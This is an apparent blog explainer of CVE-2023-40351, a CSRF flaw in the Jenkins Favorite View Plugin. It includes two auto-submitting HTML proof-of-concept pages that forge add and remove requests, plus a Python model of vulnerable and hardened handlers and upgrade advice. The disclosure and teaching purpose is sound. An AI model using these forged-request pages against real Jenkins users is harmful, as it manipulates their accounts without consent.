Jenkins is everywhere in the DevOps world, and plugins are like its building blocks. One of those plugins, Favorite View Plugin up to version 5.v77a_37f62782d, had a serious weakness: an attacker could trick logged-in Jenkins users into unknowingly adding or removing favorite views, thanks to a Cross-Site Request Forgery (CSRF) vulnerability. That’s what’s at the heart of CVE-2023-40351.

Let’s look at what happened, see a working exploit, learn how it works, and find out how you can stay safe.

What’s CVE-2023-40351?

Simply put, the Favorite View Plugin didn’t properly check if requests to add or remove favorite views were intentionally initiated by a valid user. CSRF vulnerabilities exploit this by making users’ browsers perform unwanted actions (like clicking buttons or submitting forms) without their knowledge, as long as they’re logged into Jenkins.

Attackers could build a malicious web page (i.e., CSRF attack vector) and, if an authorized Jenkins user visited it, add or remove views from their favorites – without user consent.

What’s the Impact?

* Attackers can silently manipulate Jenkins UI for targeted users.
* This is mostly about UI tampering, but could cause confusion, dashboard mismanagement, or open doors for further social engineering attacks.

- Jenkins Security Advisory for CVE-2023-40351
- CVE Details Page
- Favorite View Plugin GitHub

Here’s a simple breakdown:

1. The plugin’s requests to add or remove favorite views require only a plain GET or POST, with no CSRF protection token.
2. If a logged-in user’s browser makes such a request (say, by viewing a malicious website), Jenkins honors it.

Example Exploit – Adding a View to Favorites

Suppose Jenkins is running at http://jenkins.local/, user "alice" is logged in, and there is a view called "Builds".

Here’s a simple HTML exploit page:

<!-- CSRF PoC: Add 'Builds' to alice's favorites -->
<html>
  <body>
    <form action="http://jenkins.local/user/alice/favoriteViews/add" method="POST">
      <input type="hidden" name="view" value="Builds"/>
      <input type="submit" value="Click here" />
    </form>
    <!-- Auto submit the form as soon as the page loads -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

When "alice" visits this site while logged into Jenkins, the script silently sends a request to Jenkins, which adds the "Builds" view to her favorites – no questions asked.

Similarly, you can remove favorites by targeting the remove URL and parameters:

<!-- CSRF PoC: Remove 'Builds' from alice's favorites -->
<html>
  <body>
    <form action="http://jenkins.local/user/alice/favoriteViews/remove" method="POST">
      <input type="hidden" name="view" value="Builds"/>
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Why Does This Work?

There’s no token or same-origin check. The browser automatically attaches Alice’s session cookie for Jenkins to the request if she’s logged in, making the request look legit.

How to Fix It

Upgrade immediately to the latest version of the Favorite View Plugin where fixes have been shipped. The maintainers patched this by enforcing CSRF protection tokens on these endpoints.

- Download Jenkins Favorite View Plugin – latest
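To make the fix concrete, here is an added example (not the plugin’s code and not from the advisory) that models the favoriteViews endpoint before and after CSRF hardening: the pre-fix handler trusts the session cookie alone, while the hardened one also requires a POST, a per-session token and a matching Origin. The handler names, the request layout and the "Jenkins-Crumb" header name are assumptions made for the model.

```python
# Added example (not the plugin's code): a model of the favoriteViews endpoint before
# and after CSRF hardening. Handler names and the "Jenkins-Crumb" header are assumed.
import hmac
import secrets

JENKINS_ORIGIN = "http://jenkins.local"  # deployment origin used in the post
SESSIONS = {}  # session id -> per-session CSRF token (Jenkins calls it a "crumb")

def issue_session():
    sid, crumb = secrets.token_hex(16), secrets.token_hex(32)
    SESSIONS[sid] = crumb
    return sid, crumb

def apply_change(req, favorites):
    # The state change itself (the post's add and remove endpoints); both handlers
    # reach it only after their own checks pass.
    action = req["path"].rsplit("/", 1)[-1]
    {"add": favorites.add, "remove": favorites.discard}[action](req["form"].get("view", ""))
    return 200

def vulnerable_handler(req, favorites):
    # Pre-fix: a valid session cookie is the only check; the browser attaches it to the forged post.
    if req["cookies"].get("JSESSIONID") not in SESSIONS:
        return 403
    return apply_change(req, favorites)

def hardened_handler(req, favorites):
    # Fixed: POST only, a per-session token the attacker's page cannot read, and
    # (defence in depth) a matching Origin whenever the browser sends one.
    sid = req["cookies"].get("JSESSIONID")
    if sid not in SESSIONS or req["method"] != "POST":
        return 403
    supplied = req["headers"].get("Jenkins-Crumb") or req["form"].get("crumb", "")
    if not hmac.compare_digest(supplied, SESSIONS[sid]):
        return 403
    origin = req["headers"].get("Origin")
    if origin is not None and origin != JENKINS_ORIGIN:
        return 403
    return apply_change(req, favorites)

def demo():
    # Replay the post's forged "add Builds" request, then a legitimate one; attacker origin is constructed.
    sid, crumb = issue_session()
    base = {"method": "POST", "path": "/user/alice/favoriteViews/add",
            "form": {"view": "Builds"}, "cookies": {"JSESSIONID": sid}}
    forged = {**base, "headers": {"Origin": "http://attacker.example"}}
    legit = {**base, "headers": {"Origin": JENKINS_ORIGIN, "Jenkins-Crumb": crumb}}
    before, after = set(), set()
    results = [vulnerable_handler(forged, before), hardened_handler(forged, after)]
    blocked = sorted(after)  # snapshot: the hardened handler must have added nothing
    results.append(hardened_handler(legit, after))
    return results, sorted(before), blocked, sorted(after)
```

`demo()` returns `([200, 403, 200], ["Builds"], [], ["Builds"])`: the forged request succeeds only against the pre-fix handler, and the legitimate request still works once it carries the crumb.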

Final Thoughts

Little things like favorites in Jenkins might seem unimportant… until an attacker messes with them! CSRF vulnerabilities can slip into plugin code easily if good practices aren’t followed. Always keep plugins updated and watch Jenkins security advisories.

Stay safe, keep your builds tidy, and happy hacking! 🚀

*If you found this post useful, check out the original Jenkins security advisory for more details. Patch early, patch often!*

Timeline

Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/22/2023 22:39:00 UTC